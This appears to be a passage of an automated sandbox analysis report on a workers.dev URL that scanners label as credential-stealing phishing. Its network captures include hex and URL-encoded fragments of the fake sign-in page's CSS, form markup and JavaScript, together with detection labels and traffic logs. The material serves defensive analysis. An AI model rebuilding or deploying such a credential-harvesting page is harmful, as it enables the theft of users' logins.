2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f Data Ascii: tom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20margin%3A%20auto
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 30 25 32 30 30 25 32 30 2f 25 32 30 32 30 Data Ascii: idth%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%200%200%20/%2020
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 32 25 33 45 53 69 67 6e 25 32 30 69 6e 25 Data Ascii: 5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%22%3ESign%20in%
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 Data Ascii: %3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%20%20
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 65 78 74 25 32 37 25 Data Ascii: ail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%28%27.next%27%
2024-04-28 23:11:58 UTC	1369	IN	Data Raw: 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 Data Ascii: .style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%20%20%20%20%20
2024-04-28 23:11:58 UTC	354	IN	Data Raw: 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 Data Ascii: 20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%20%20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49772	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:12:05 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkkYdLFfe5F6fPB&MD=dEo2Yeht HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-28 23:12:05 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: abb1319f-9786-4b08-b80a-9ab1d7b61237 MS-RequestId: fbd1ce4f-3ef1-40de-8b7b-c0d1f9e808c9 MS-CV: 9zgoBJbG+kyLDuXw.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 28 Apr 2024 23:12:04 GMT Connection: close Content-Length: 25457
2024-04-28 23:12:05 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-04-28 23:12:05 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	35.190.80.1	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:12:40 UTC	542	OUT	OPTIONS /report/v4?s=dNZvdN2PmFph2g5zCYD%2BUdT5nsiJQKyxzu%2FbuMUUbcaKhlSUKSZRRNz2BCp0mWXTGlxFirGx6BgOVPBIXxNV5E6hd3iW2o6rtU44vTFDqKNO%2Bc7hPNttF1b1GWvznt69TAlSq5Ig HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://www.linkpicture.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:12:40 UTC	336	IN	HTTP/1.1 200 OK content-length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Sun, 28 Apr 2024 23:12:40 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49776	35.190.80.1	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:12:40 UTC	480	OUT	POST /report/v4?s=dNZvdN2PmFph2g5zCYD%2BUdT5nsiJQKyxzu%2FbuMUUbcaKhlSUKSZRRNz2BCp0mWXTGlxFirGx6BgOVPBIXxNV5E6hd3iW2o6rtU44vTFDqKNO%2Bc7hPNttF1b1GWvznt69TAlSq5Ig HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 481 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:12:40 UTC	481	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 34 32 36 30 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 76 62 76 66 64 76 64 6a 76 76 2e 66 79 66 79 76 66 79 74 76 67 68 76 2e 77 6f 72 6b 65 72 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 33 35 2e 31 38 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 Data Ascii: [{"age":42604,"body":{"elapsed_time":500,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/","sampling_fraction":1.0,"server_ip":"104.21.235.181","status_code":404,"type":"http.error"},"type
2024-04-28 23:12:41 UTC	168	IN	HTTP/1.1 200 OK content-length: 0 date: Sun, 28 Apr 2024 23:12:40 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 6044, Parent PID: 3264

General

Target ID:	0
Start time:	01:11:03
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3636, Parent PID: 5328

General

Target ID:	1
Start time:	01:11:09
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5840, Parent PID: 6044

General

Target ID:	3
Start time:	01:11:10
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2024,i,4639364599846201149,15810019114583765564,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6228, Parent PID: 3636

General

Target ID:	4
Start time:	01:11:10
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,12684436433674402731,16423869369872526570,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7020, Parent PID: 3264

General

Target ID:	8
Start time:	01:11:37
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/"
Imagebase:	0x800000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/	Avira URL Cloud: detection malicious, Label: phishing
Source: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Source: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/style.css	Avira URL Cloud: Label: phishing

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_56, type: DROPPED
Source: Yara match	File source: dropped/chromecache_51, type: DROPPED
Source: Yara match	File source: dropped/chromecache_48, type: DROPPED
Source: Yara match	File source: dropped/chromecache_50, type: DROPPED

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.208.106
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGJCvu7EGIjAVFeFXZ3cxMO0krL__GxSD10I8mSsWmyN1j1S6OFdhtkIYAXNkOrF93XGZRsvJ13AyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-28-23; 